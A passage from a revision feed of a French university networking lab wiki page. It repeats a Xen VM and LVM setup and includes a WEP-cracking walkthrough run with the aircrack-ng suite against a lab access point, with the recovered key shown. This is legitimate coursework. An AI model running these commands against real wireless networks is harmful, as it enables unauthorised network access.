 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
#  Disk device(s).&lt;br /&gt;
#&lt;br /&gt;
root        = '/dev/xvda2 ro'&lt;br /&gt;
disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
#  Networking&lt;br /&gt;
#&lt;br /&gt;
vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56255</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56255"/>
				<updated>2021-10-25T15:11:29Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Création de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56240</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56240"/>
				<updated>2021-10-25T15:02:48Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Création de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plutard.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56239</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56239"/>
				<updated>2021-10-25T15:01:56Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Création de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plutard.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56234</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56234"/>
				<updated>2021-10-25T14:59:26Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Création de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plutard.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
